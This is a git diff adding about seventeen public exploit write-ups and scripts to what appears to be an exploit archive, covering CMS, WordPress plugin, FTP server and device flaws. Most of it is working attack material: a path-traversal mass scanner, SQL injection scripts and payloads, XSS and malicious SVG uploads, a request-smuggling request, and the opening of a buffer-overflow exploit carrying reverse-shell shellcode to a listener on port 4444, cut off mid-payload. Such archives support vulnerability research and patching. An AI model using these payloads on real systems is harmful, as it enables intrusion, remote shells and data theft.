CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )
CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')

Hyip Rio 2.1 - Arbitrary File Upload

Member Login Script 3.3 - Client-side desync

SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS

WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)

Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow

Kingo ROOT 1.5.8 - Unquoted Service Path

NVClient v5.0 - Stack Buffer Overflow (DoS)

Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
---
 exploits/hardware/webapps/51709.txt |  18 ++++
 exploits/multiple/webapps/51708.py  |  39 +++++++++
 exploits/php/webapps/51697.txt      |  20 +++++
 exploits/php/webapps/51698.txt      |  49 +++++++++++
 exploits/php/webapps/51701.txt      |  56 +++++++++++++
 exploits/php/webapps/51702.txt      |  50 ++++++++++++
 exploits/php/webapps/51703.txt      |  41 ++++++++++
 exploits/php/webapps/51704.txt      |  39 +++++++++
 exploits/php/webapps/51705.txt      |  28 +++++++
 exploits/php/webapps/51710.txt      |  88 ++++++++++++++++++++
 exploits/php/webapps/51711.py       |  53 ++++++++++++
 exploits/php/webapps/51712.txt      |  48 +++++++++++
 exploits/php/webapps/51713.txt      |  39 +++++++++
 exploits/windows/local/51700.txt    |  30 +++++++
 exploits/windows/local/51706.txt    |  70 ++++++++++++++++
 exploits/windows/local/51707.txt    |  29 +++++++
 exploits/windows/remote/51699.py    | 122 ++++++++++++++++++++++++++++
 files_exploits.csv                  |  21 ++++-
 18 files changed, 838 insertions(+), 2 deletions(-)
 create mode 100644 exploits/hardware/webapps/51709.txt
 create mode 100755 exploits/multiple/webapps/51708.py
 create mode 100644 exploits/php/webapps/51697.txt
 create mode 100644 exploits/php/webapps/51698.txt
 create mode 100644 exploits/php/webapps/51701.txt
 create mode 100644 exploits/php/webapps/51702.txt
 create mode 100644 exploits/php/webapps/51703.txt
 create mode 100644 exploits/php/webapps/51704.txt
 create mode 100644 exploits/php/webapps/51705.txt
 create mode 100644 exploits/php/webapps/51710.txt
 create mode 100755 exploits/php/webapps/51711.py
 create mode 100644 exploits/php/webapps/51712.txt
 create mode 100644 exploits/php/webapps/51713.txt
 create mode 100644 exploits/windows/local/51700.txt
 create mode 100644 exploits/windows/local/51706.txt
 create mode 100644 exploits/windows/local/51707.txt
 create mode 100755 exploits/windows/remote/51699.py

diff --git a/exploits/hardware/webapps/51709.txt b/exploits/hardware/webapps/51709.txt
new file mode 100644
index 0000000000..7e48513992
--- /dev/null
+++ b/exploits/hardware/webapps/51709.txt
@@ -0,0 +1,18 @@
+# Exploit Title : DLINK DPH-400SE - Exposure of Sensitive Information
+# Date : 25-08-2023
+# Exploit Author : tahaafarooq
+# Vendor Homepage : https://dlink.com/
+# Version : FRU2.2.15.8
+# Tested on: DLINK DPH-400SE (VoIP Phone)
+
+Description:
+
+With default credential for the guest user "guest:guest" to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users. For a thorough POC writeup visit: https://hackmd.io/@tahaafarooq/dlink-dph-400se-cwe-200
+
+POC :
+
+1. Login with the default guest credentials "guest:guest"
+2. Access the Maintenance tab.
+3. Under the maintenance tab, access the "Access" feature
+4. On "Account Option" choose a user to modify, thus "Admin" and click modify.
+5. Right click on the password, and click reveal, the password is then seen in plaintext.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51708.py b/exploits/multiple/webapps/51708.py
new file mode 100755
index 0000000000..c6b646ff08
--- /dev/null
+++ b/exploits/multiple/webapps/51708.py
@@ -0,0 +1,39 @@
+# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion
+# Date: 8/22/2023
+# Exploit Author: Bryce "Raindayzz" Harty
+# Vendor Homepage: https://www.filemage.io/
+# Version: Azure Versions < 1.10.9
+# Tested on: All Azure deployments < 1.10.9
+# CVE : CVE-2023-39026
+
+# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
+# Patch from vendor - https://www.filemage.io/docs/updates.html
+
+import requests
+import warnings
+warnings.filterwarnings("ignore")
+def worker(url):
+    response = requests.get(url, verify=False, timeout=.5)
+    return response
+def main():
+    listIP = []
+    file_path = input("Enter the path to the file containing the IP addresses: ")
+    with open(file_path, 'r') as file:
+        ip_list = file.read().splitlines()
+        searchString = "tls"
+        for ip in ip_list:
+            url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"
+            try:
+                response = worker(url)
+                #print(response.text)
+                if searchString in response.text:
+                    print("Vulnerable IP: " + ip)
+                    print(response.text)
+                    listIP.append(ip)
+            except requests.exceptions.RequestException as e:
+                print(f"Error occurred for {ip}: {str(e)}")
+
+    for x in listIP:
+        print(x)
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/51697.txt b/exploits/php/webapps/51697.txt
new file mode 100644
index 0000000000..258dd9a843
--- /dev/null
+++ b/exploits/php/webapps/51697.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Blood Donor Management System v1.0 - Stored XSS
+# Application: Blood Donor Management System
+# Version: v1.0
+# Bugs:  Stored XSS
+# Technology: PHP
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/blood-donor-management-system-using-codeigniter/
+# Date: 15.08.2023
+# Author: Ehlullah Albayrak
+# Tested on: Windows
+
+
+#POC
+========================================
+1. Login to user account
+2. Go to Profile
+3. Change "State" input and add "<script>alert("xss")</script>" payload.
+4. Go to http://localhost/blood/welcome page and search "O", XSS will be triggered.
+
+#Payload: <script>alert("xss")</script>
\ No newline at end of file
diff --git a/exploits/php/webapps/51698.txt b/exploits/php/webapps/51698.txt
new file mode 100644
index 0000000000..75591fa6df
--- /dev/null
+++ b/exploits/php/webapps/51698.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Hyip Rio 2.1 - Arbitrary File Upload
+# Exploit Author: CraCkEr
+# Date: 30/07/2023
+# Vendor: tdevs
+# Vendor Homepage: https://tdevs.co/
+# Software Link: https://hyiprio-feature.tdevs.co/
+# Version: 2.1
+# Tested on: Windows 10 Pro
+# Impact: Allows User to upload files to the web server
+# CVE: CVE-2023-4382
+
+
+## Description
+
+Allows Attacker to upload malicious files onto the server, such as Stored XSS
+
+
+## Steps to Reproduce:
+
+1. Login as a [Normal User]
+2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/user/settings
+3. Upload any Image into the [avatar]
+4. Capture the POST Request with [Burp Proxy Intercept]
+5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]
+
+-----------------------------------------------------------
+POST /user/settings/profile-update HTTP/2
+
+Content-Disposition: form-data; name="avatar"; filename="XSS.svg"
+Content-Type: image/png
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+<script type="text/javascript">
+alert("XSS by Skalvin");
+</script>
+</svg>
+-----------------------------------------------------------
+
+6. Send the Request
+7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] or right-click on the Avatar and Copy the Link
+8. Access your Uploded Evil file on this Path: https://website/assets/global/images/********************.svg
+
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51701.txt b/exploits/php/webapps/51701.txt
new file mode 100644
index 0000000000..0e64963114
--- /dev/null
+++ b/exploits/php/webapps/51701.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Credit Lite 1.5.4 - SQL Injection
+# Exploit Author: CraCkEr
+# Date: 31/07/2023
+# Vendor: Hobby-Tech
+# Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392
+# Software Link: https://credit-lite.appshat.xyz/
+# Version: 1.5.4
+# Tested on: Windows 10 Pro
+# Impact: Database Access
+# CVE: CVE-2023-4407
+# CWE: CWE-89 - CWE-74 - CWE-707
+
+## Description
+
+SQL injection attacks can allow unauthorized access to sensitive data, modification of
+data and crash the application or make it unavailable, leading to lost revenue and
+damage to a company's reputation.
+
+
+
+## Steps to Reproduce:
+
+To Catch the POST Request
+
+1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement
+
+2. Select [Start Date] + [End Date] + [Account Number] and Click on [Filter]
+
+
+
+Path: /portal/reports/account_statement
+
+POST parameter 'date1' is vulnerable to SQL Injection
+POST parameter 'date2' is vulnerable to SQL Injection
+
+-------------------------------------------------------------------------
+POST /portal/reports/account_statement HTTP/2
+
+_token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001
+-------------------------------------------------------------------------
+
+---
+Parameter: date1 (POST)
+Type: time-based blind
+Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001
+
+Parameter: date2 (POST)
+Type: time-based blind
+Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001
+---
+
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51702.txt b/exploits/php/webapps/51702.txt
new file mode 100644
index 0000000000..8abd1d701d
--- /dev/null
+++ b/exploits/php/webapps/51702.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload
+# Exploit Author: CraCkEr
+# Date: 05/08/2023
+# Vendor: Creativeitem
+# Vendor Homepage: https://academylms.net/
+# Software Link: https://demo.academylms.net/
+# Version: 6.1
+# Tested on: Windows 10 Pro
+# Impact: Allows User to upload files to the web server
+# CWE: CWE-79 - CWE-74 - CWE-707
+
+
+## Description
+
+Allows Attacker to upload malicious files onto the server, such as Stored XSS
+
+
+## Steps to Reproduce:
+
+1. Login as a [Normal User]
+2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings
+3. Upload any Image into the [avatar]
+4. Capture the POST Request with [Burp Proxy Intercept]
+5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]
+
+-----------------------------------------------------------
+POST /wp-admin/async-upload.php HTTP/2
+
+-----------------------------------------------------------
+Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+<script type="text/javascript">
+alert("XSS by CraCkEr");
+</script>
+</svg>
+-----------------------------------------------------------
+
+6. Send the Request
+7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]
+8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg
+
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51703.txt b/exploits/php/webapps/51703.txt
new file mode 100644
index 0000000000..6c79a74988
--- /dev/null
+++ b/exploits/php/webapps/51703.txt
@@ -0,0 +1,41 @@
+# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )
+# Date: 2023/08/18
+# CVE: CVE-2023-38910
+# Exploit Author: Daniel González
+# Vendor Homepage: https://www.cszcms.com/
+# Software Link: https://github.com/cskaza/cszcms
+# Version: 1.3.0
+# Tested on: CSZ CMS 1.3.0
+# Description:
+# CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin.
+
+# Steps to reproduce Stored XSS:
+
+Go to url http://localhost/admin/carousel.
+
+We edit that Carousel that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL” and “Photo URL” fields.
+We can inject HTML code.
+
+With the following payload we can achieve the XSS.
+
+Payload:
+
+<div><p title="</div><svg/onload=alert(document.domain)>">
+
+
+#PoC Request:
+
+
+POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 137
+Origin: http://localhost:8080
+Referer: http://localhost:8080/admin/carousel/edit/3
+Upgrade-Insecure-Requests: 1
+
+carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add
\ No newline at end of file
diff --git a/exploits/php/webapps/51704.txt b/exploits/php/webapps/51704.txt
new file mode 100644
index 0000000000..3c4b91edf8
--- /dev/null
+++ b/exploits/php/webapps/51704.txt
@@ -0,0 +1,39 @@
+# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
+# Date: 2023/08/18
+# CVE: CVE-2023-38911
+# Exploit Author: Daniel González
+# Vendor Homepage: https://www.cszcms.com/
+# Software Link: https://github.com/cskaza/cszcms
+# Version: 1.3.0
+# Tested on: CSZ CMS 1.3.0
+# Description:
+# CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery.
+
+# Steps to reproduce Stored XSS:
+
+Go to url http://localhost/admin/plugin/gallery/edit/2.
+
+When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2]
+We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields.
+
+With the following payload we can achieve the XSS
+
+Payload:
+
+<div><p title="</div><svg/onload=alert(document.domain)>">
+
+
+#PoC Request:
+
+POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 140
+Origin: http://localhost:8080
+Referer: http://localhost:8080/admin/plugin/gallery/edit/2
+Upgrade-Insecure-Requests: 1
+
+gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add
\ No newline at end of file
diff --git a/exploits/php/webapps/51705.txt b/exploits/php/webapps/51705.txt
new file mode 100644
index 0000000000..c4f26b27a5
--- /dev/null
+++ b/exploits/php/webapps/51705.txt
@@ -0,0 +1,28 @@
+# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control
+# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)
+# Date: 21.12.2022
+# Exploit Author: kv1to
+# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17
+# Tested on: Raspbian / Debian
+# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497
+# CVE : CVE-2022-23513
+
+In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.
+
+## Proof Of Concept with curl:
+curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'
+
+## HTTP requests
+GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1
+HOST: pi.hole
+Cookie: [..SNIPPED..]
+[..SNIPPED..]
+
+## HTTP Response
+HTTP/1.1 200 OK
+[..SNIPPED..]
+
+data: Match found in [..SNIPPED..]
+data: <domain>
+data: <domain>
+data: <domain>
\ No newline at end of file
diff --git a/exploits/php/webapps/51710.txt b/exploits/php/webapps/51710.txt
new file mode 100644
index 0000000000..9d85231008
--- /dev/null
+++ b/exploits/php/webapps/51710.txt
@@ -0,0 +1,88 @@
+## Title: Member Login Script 3.3 - Client-side desync
+## Author: nu11secur1ty
+## Date: 08/25/2023
+## Vendor: https://www.phpjabbers.com/
+## Reference: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync
+
+## Description:
+The server appears to be vulnerable to client-side desync attacks. A
+POST request was sent to the path '/1692959852_473/index.php' with a
+second request sent as the body. The server ignored the Content-Length
+header and did not close the connection, leading to the smuggled
+request being interpreted as the next request.
+
+STATUS: HIGH Vulnerability
+
+[+]Exploit:
+```
+POST /1692959852_473/index.php?controller=pjFront&action=pjActionLoadCss
+HTTP/1.1
+Host: demo.phpjabbers.com
+Accept-Encoding: gzip, deflate
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
+Safari/537.36
+Connection: keep-alive
+Cache-Control: max-age=0
+Cookie: _ga=GA1.2.2069938240.1692907228;
+_gid=GA1.2.1275975650.1692907228; _gat=1;
+_fbp=fb.1.1692907228280.366290059;
+_ga_NME5VTTGTT=GS1.2.1692957291.2.1.1692957719.60.0.0;
+YellowPages=slk3eokcgmdf0r3t7c020quv35;
+pjd=g0i8fch5jkebraaaf2812afvb5; pjd_1692957219_259=1
+Upgrade-Insecure-Requests: 1
+Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
+Sec-CH-UA-Platform: Windows
+Sec-CH-UA-Mobile: ?0
+Content-Length: 1190
+Content-Type: application/x-www-form-urlencoded
+
+GET /robots.txt HTTP/1.1
+Host: demo.phpjabbers.com
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
+Safari/537.36
+Connection: keep-alive
+Cache-Control: max-age=0
+
+GET /robots.txt HTTP/2
+Host: www.pornhub.com
+Cookie: platform=pc; ss=405039333413129808;
+fg_0d2ec4cbd943df07ec161982a603817e=60256.100000;
+fg_9951ce1ac4434b4ac312a1334fa77d82=6902.100000
+Cache-Control: max-age=0
+Sec-Ch-Ua:
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Full-Version: ""
+Sec-Ch-Ua-Arch: ""
+Sec-Ch-Ua-Platform: ""
+Sec-Ch-Ua-Platform-Version: ""
+Sec-Ch-Ua-Model: ""
+Sec-Ch-Ua-Full-Version-List:
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
+Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Member-Login-Script-3.3)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/08/member-login-script-33-client-side.html)
+
+## Time spend:
+00:35:00
\ No newline at end of file
diff --git a/exploits/php/webapps/51711.py b/exploits/php/webapps/51711.py
new file mode 100755
index 0000000000..384e03ae04
--- /dev/null
+++ b/exploits/php/webapps/51711.py
@@ -0,0 +1,53 @@
+# Exploit Title: WP Statistics Plugin <= 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)
+# Date: 13/02/2022
+# Exploit Author: psychoSherlock
+# Vendor Homepage: https://wp-statistics.com/
+# Software Link: https://downloads.wordpress.org/plugin/wp-statistics.13.1.5.zip
+# Version: 13.1.5 and prior
+# Tested on: wp-statistics 13.1.5
+# CVE : CVE-2022-25148
+# Vendor URL: https://wordpress.org/plugins/wp-statistics/
+# CVSS Score: 8.4 (High)
+
+import argparse
+import requests
+import re
+import urllib.parse
+
+
+def main():
+    parser = argparse.ArgumentParser(description="CVE-2022-25148")
+    parser.add_argument('-u', '--url', required=True,
+                        help='Wordpress base URL')
+
+    args = parser.parse_args()
+
+    baseUrl = args.url
+    payload = "IF(1=1, sleep(5), 1)"
+
+    wp_session = requests.session()
+
+    resp = wp_session.get(baseUrl)
+    nonce = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', resp.text).group(1)
+    print(f"Gathered Nonce: {nonce}")
+
+    headers = {
+        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}
+
+    payload = urllib.parse.quote_plus(payload)
+    exploit = f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={nonce}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id={payload}&search_query&page_uri=/&user_id=0'
+    exploit_url = baseUrl + exploit
+
+    print(f'\nSending: {exploit_url}')
+
+    resp = wp_session.get(exploit_url, headers=headers)
+
+    if float(resp.elapsed.total_seconds()) >= 5.0:
+        print("\n!!! Target is vulnerable !!!")
+        print(f'\nTime taken: {resp.elapsed.total_seconds()}')
+    else:
+        print('Target is not vulnerable')
+
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/51712.txt b/exploits/php/webapps/51712.txt
new file mode 100644
index 0000000000..6a66cde1fc
--- /dev/null
+++ b/exploits/php/webapps/51712.txt
@@ -0,0 +1,48 @@
+## Title: Bus Reservation System-1.1 Multiple-SQLi
+## Author: nu11secur1ty
+## Date: 08/26/2023
+## Vendor: https://www.phpjabbers.com/
+## Software: https://demo.phpjabbers.com/1693027053_628/preview.php?lid=1
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The `pickup_id` parameter appears to be vulnerable to SQL injection
+attacks. The payload ' was submitted in the pickup_id parameter, and a
+database error message was returned. You should review the contents of
+the error message, and the application's handling of other input, to
+confirm whether a vulnerability is present. The attacker can steal
+information from all database!
+
+STATUS: HIGH-CRITICAL Vulnerability
+
+[+]Payload:
+```mysql
+---
+Parameter: pickup_id (GET)
+    Type: boolean-based blind
+    Title: Boolean-based blind - Parameter replace (original value)
+    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT
+(CASE WHEN (3959=3959) THEN 0x3927 ELSE (SELECT 8499 UNION SELECT
+2098) END))&session_id=
+
+    Type: error-based
+    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
+    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT
+(ELT(5210=5210,1))),0x716a6b7171),5210)&session_id=
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
+    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT
+2616 FROM (SELECT(SLEEP(15)))clIR)&session_id=
+---
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Bus-Reservation-System-1.1-Multiple-SQLi)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/08/bus-reservation-system-11-multiple-sqli.html)
+
+## Time spend:
+00:25:00
\ No newline at end of file
diff --git a/exploits/php/webapps/51713.txt b/exploits/php/webapps/51713.txt
new file mode 100644
index 0000000000..cb2078fcea
--- /dev/null
+++ b/exploits/php/webapps/51713.txt
@@ -0,0 +1,39 @@
+# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 20/08/2023
+# Vendor: SPA-Cart
+# Vendor Homepage: https://spa-cart.com/
+# Software Link: https://demo.spa-cart.com/
+# Version: 1.9.0.3
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4547
+# CWE: CWE-79 - CWE-74 - CWE-707
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+Path: /search
+
+GET parameter 'filter[brandid]' is vulnerable to XSS
+GET parameter 'filter[price]' is vulnerable to XSS
+
+https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GB
+
+
+XSS Payloads:
+
+vnxjb"><script>alert(1)</script>bvu51
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/windows/local/51700.txt b/exploits/windows/local/51700.txt
new file mode 100644
index 0000000000..735de3640a
--- /dev/null
+++ b/exploits/windows/local/51700.txt
@@ -0,0 +1,30 @@
+# Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS)
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 2023-08-19
+# Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar
+# Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf
+# Vulnerability Type: Buffer Overflow Local
+# Tested On: Windows 10 64bit
+# Tested Version: 5.0
+
+
+# Steps to Reproduce:
+# 1- Run the python script and create exploit.txt file
+# 2- Open the application and log in
+# 3- Click the "Config" button in the upper menu
+# 4- Click the "User" button just below it
+# 5- Now click the "Add users" button in the lower left
+# 6- Fill in the Username, Password, and Confirm boxes
+# 7- Paste the characters from exploit.txt into the Contact box
+# 8- Click OK and crash!
+
+#!/usr/bin/env python3
+
+exploit = 'A' * 846
+
+try:
+    with open("exploit.txt","w") as file:
+        file.write(exploit)
+    print("POC is created")
+except:
+    print("POC not created")
\ No newline at end of file
diff --git a/exploits/windows/local/51706.txt b/exploits/windows/local/51706.txt
new file mode 100644
index 0000000000..3fe6c34c2f
--- /dev/null
+++ b/exploits/windows/local/51706.txt
@@ -0,0 +1,70 @@
+#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
+#Date: 08/22/2023
+#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
+#Vendor Homepage: http://www.freefoat.com
+#Version: 1.0
+#Tested on Windows XP SP3
+
+
+#!/usr/bin/python
+
+import socket
+
+#Metasploit Shellcode
+#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d'
+
+#nc -lvp 4444
+#Send exploit
+
+
+#offset = 247
+#badchars=\x00\x0d\
+#return_address=\x3b\x69\x5a\x77 (ole32.dll)
+
+payload = (
+"\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9"
+"\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca"
+"\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83"
+"\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26"
+"\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49"
+"\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54"
+"\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66"
